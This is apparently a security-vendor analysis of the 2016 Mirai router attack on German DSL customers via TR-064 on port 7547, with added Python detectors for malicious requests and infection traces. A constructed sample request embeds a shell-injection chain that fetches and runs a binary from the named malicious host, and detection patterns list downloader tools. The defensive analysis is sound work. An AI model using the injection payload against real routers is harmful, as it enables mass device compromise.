Since yesterday, many DSL customers in Germany have been reporting problems with their routers, which were either unable to connect to their ISP at all or had a very weak internet connection.
Today news broke that a malicious attack could be the reason for this widespread problem.
Fortunately, we got some more technical details from users reporting the specific behaviour. With this information we were able to get hold of some samples and reconstruct some details. Let's have a quick look:
As mentioned, users were seeing suspicious network activity.
They saw this request incoming on TCP port 7547:
This request follows the TR-064 specification, which defines methods for LAN-side configuration of DSL CPE (customer-premises equipment); on the affected devices the service was reachable from the internet on TCP port 7547.
A vulnerability in the affected routers causes the device to download the binary named "1" from http://l.ocalhost[.]host into the /tmp directory and execute it.
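To make the incoming request actionable for detection, here is an added example (ours, not from the original post) of a small heuristic classifier for HTTP requests seen on TCP port 7547. It treats a request as TR-064 when it carries a SOAPAction header or the urn:dslforum-org:service namespace, and flags it when the SOAP body additionally contains download-and-execute indicators of the kind described above (an http URL outside the standard schema attributes, a /tmp path, wget/chmod, shell metacharacters). The three requests embedded below are constructed for this example; the "malicious" one only reproduces those indicators and is not the real exploit request, and its action and parameter names (SetConfig, NewValue) are placeholders.

```python
"""Heuristic classifier for TR-064 requests on TCP/7547 (added example, constructed samples)."""
import re
from typing import Dict, List, Tuple

TR064_NAMESPACE = b"urn:dslforum-org:service"

# Every legitimate SOAP envelope carries schema URLs as attribute values;
# strip those so the URL indicator below does not fire on them.
SCHEMA_ATTR = re.compile(
    rb'\s[\w:.-]+="https?://(?:schemas\.xmlsoap\.org|www\.w3\.org)[^"]*"')

# Content a CPE-management SOAP body has no legitimate reason to contain.
SUSPICIOUS = [
    (re.compile(rb"https?://", re.I), "url_in_body"),
    (re.compile(rb"/tmp\b"), "tmp_path"),
    (re.compile(rb"\b(?:wget|curl|tftp|busybox|chmod)\b", re.I), "downloader_or_chmod"),
    (re.compile(rb"[`;|&]"), "shell_metachar"),
]


def split_request(raw: bytes) -> Tuple[bytes, Dict[bytes, bytes], bytes]:
    """Split a raw HTTP request into request line, lower-cased headers and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers: Dict[bytes, bytes] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def classify_request(raw: bytes, dst_port: int = 7547) -> Dict:
    """Return tr064 flag, matched indicators and a verdict for one request."""
    request_line, headers, body = split_request(raw)
    is_tr064 = dst_port == 7547 and (b"soapaction" in headers or TR064_NAMESPACE in body)
    scan = SCHEMA_ATTR.sub(b"", body)
    indicators: List[str] = [name for rx, name in SUSPICIOUS if rx.search(scan)]
    verdict = "suspicious" if is_tr064 and indicators else "benign"
    return {
        "method": request_line.split(b" ")[0].decode(errors="replace"),
        "tr064": is_tr064,
        "indicators": indicators,
        "verdict": verdict,
    }


# Constructed samples (not captured traffic). Host l.ocalhost[.]host is the
# defanged download host named in the post above.
SAMPLE_BENIGN = (
    b"POST /UD/act?1 HTTP/1.1\r\n"
    b"Host: 192.0.2.1:7547\r\n"
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b"SOAPAction: urn:dslforum-org:service:Time:1#GetInfo\r\n"
    b"\r\n"
    b'<?xml version="1.0"?>'
    b'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"'
    b' s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">'
    b'<s:Body><u:GetInfo xmlns:u="urn:dslforum-org:service:Time:1"/></s:Body>'
    b"</s:Envelope>"
)

SAMPLE_MALICIOUS = (
    b"POST /UD/act?1 HTTP/1.1\r\n"
    b"Host: 192.0.2.1:7547\r\n"
    b"Content-Type: text/xml; charset=utf-8\r\n"
    b"SOAPAction: urn:dslforum-org:service:Time:1#SetConfig\r\n"
    b"\r\n"
    b'<?xml version="1.0"?>'
    b'<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">'
    b'<s:Body><u:SetConfig xmlns:u="urn:dslforum-org:service:Time:1">'
    b"<NewValue>`cd /tmp;wget http://l.ocalhost[.]host/1;chmod 777 1;./1`</NewValue>"
    b"</u:SetConfig></s:Body></s:Envelope>"
)

# Non-SOAP request on the same port: URL and '&' in the body, but not TR-064.
SAMPLE_NON_TR064 = (
    b"POST /login HTTP/1.1\r\n"
    b"Host: 192.0.2.1:7547\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"\r\n"
    b"redirect=http://example.invalid/&user=admin"
)

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("malicious", SAMPLE_MALICIOUS),
                         ("non-tr064", SAMPLE_NON_TR064)):
        print(name, classify_request(sample))
```

The TR-064 gate matters: the form POST carries a URL and an ampersand too, but without a SOAPAction header or the dslforum namespace it stays benign, which keeps the heuristic from firing on ordinary web traffic that happens to hit the same port.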
The IP addresses of this host changed a few times during the day.
Since 28 November 2016, 16:36 CET, the domains no longer resolve ("NXDOMAIN").
During a quick analysis of the ELF 32-bit MIPS-MSB (big-endian) variant used in today's attacks on German customers, we saw this Mirai-related sample perform the following:
Delete itself from the filesystem (it resides only in memory)
Close the vulnerable port using iptables: "iptables -A INPUT -p tcp --destination-port 7547 -j DROP"
Resolve the command-and-control servers via a hard-coded public DNS resolver (the original Mirai source uses 8.8.8.8) rather than the router's configured one
Scan the internet for open TCP port 7547 and infect other devices using the same malicious request as seen above.
Since the malware cannot write itself to the router's persistent filesystem, the infection does not survive a reboot. A rebooted device is exposed again, however: the iptables rule disappears with the process, and infected bots keep scanning port 7547.
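The two post-infection traces listed above can be checked on a running Linux device without the sample itself: a process whose executable has been deleted from disk (the bot lives only in memory, so /proc/<pid>/exe ends in "(deleted)") and an INPUT rule dropping TCP/7547. The following is an added example (ours, not from the original post) that performs both checks. The iptables listing and the /proc lookalike tree it uses are constructed for the example; on a real box run it as root and pass nothing, so it reads the live /proc and calls `iptables -S INPUT`.

```python
"""Host-side indicator check for the behaviour above (added example, constructed samples)."""
import os
import re
import subprocess
import tempfile
from typing import Dict, List, Optional, Tuple

# `iptables -S INPUT` prints rules in canonical form, e.g.
# "-A INPUT -p tcp -m tcp --dport 7547 -j DROP".
DROP_RULE = re.compile(r"-A INPUT\b.*-p tcp\b.*--dport (\d+)\b.*-j DROP")


def ports_dropped_on_input(iptables_listing: str) -> List[int]:
    """TCP destination ports for which the INPUT chain has a DROP rule."""
    ports = []
    for line in iptables_listing.splitlines():
        m = DROP_RULE.search(line)
        if m:
            ports.append(int(m.group(1)))
    return ports


def memory_resident_processes(proc_root: str = "/proc") -> List[Tuple[int, str, str]]:
    """(pid, exe target, cmdline) for processes whose exe link ends in ' (deleted)'."""
    found = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            target = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue  # kernel threads, or processes we lack permission to inspect
        if not target.endswith(" (deleted)"):
            continue
        try:
            with open(os.path.join(pid_dir, "cmdline"), "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").strip().decode(errors="replace")
        except OSError:
            cmdline = ""
        found.append((int(entry), target, cmdline))
    return found


def live_iptables_listing() -> str:
    """Current INPUT chain, or '' if iptables is not available."""
    try:
        proc = subprocess.run(["iptables", "-S", "INPUT"], capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return ""
    return proc.stdout


def report(proc_root: str = "/proc", iptables_listing: Optional[str] = None) -> Dict:
    """Combine both checks; suspect_7547_rule mirrors the rule the sample installs."""
    listing = live_iptables_listing() if iptables_listing is None else iptables_listing
    dropped = ports_dropped_on_input(listing)
    return {
        "dropped_ports": dropped,
        "suspect_7547_rule": 7547 in dropped,
        "memory_resident": memory_resident_processes(proc_root),
    }


# Constructed sample: what `iptables -S INPUT` would show after the sample's rule.
SAMPLE_IPTABLES = """-P INPUT ACCEPT
-A INPUT -i lo -j ACCEPT
-A INPUT -p tcp -m tcp --dport 7547 -j DROP
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
"""


def make_sample_proc() -> str:
    """Constructed /proc lookalike: pid 1337 runs a deleted /tmp/1, pid 42 is an ordinary shell."""
    root = tempfile.mkdtemp(prefix="fakeproc_")
    entries = (
        (1337, "/tmp/1 (deleted)", b"./1\0"),
        (42, "/bin/sh", b"sh\0-c\0sleep 1\0"),
    )
    for pid, exe_target, cmdline in entries:
        d = os.path.join(root, str(pid))
        os.makedirs(d)
        os.symlink(exe_target, os.path.join(d, "exe"))
        with open(os.path.join(d, "cmdline"), "wb") as f:
            f.write(cmdline)
    os.makedirs(os.path.join(root, "self"))  # non-numeric entries must be skipped
    return root


if __name__ == "__main__":
    print("constructed:", report(make_sample_proc(), SAMPLE_IPTABLES))
    print("live:", report())
```

Neither trace alone is conclusive: a deleted-but-running executable is also what a package upgrade leaves behind, and an operator may legitimately firewall 7547. Seen together on a consumer router right after the behaviour above, they are a strong indication that the bot is running, and a reboot followed by closing the port at the ISP or on the device is the remediation the analysis implies.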
Our products detect the corresponding binaries as HEUR:Backdoor.Linux.Mirai.b
Update (2016-11-28 19:50 CET)
At the moment the C2 servers timeserver[.]host and securityupdates[.]us both point to IPs in a /8 range associated with the US military. Since there is no Mirai-related infrastructure behind this network range, the bots will not receive any further commands until the criminals behind this attack change the DNS records again.
This is quite clearly some kind of trolling by the criminals who conducted the attack.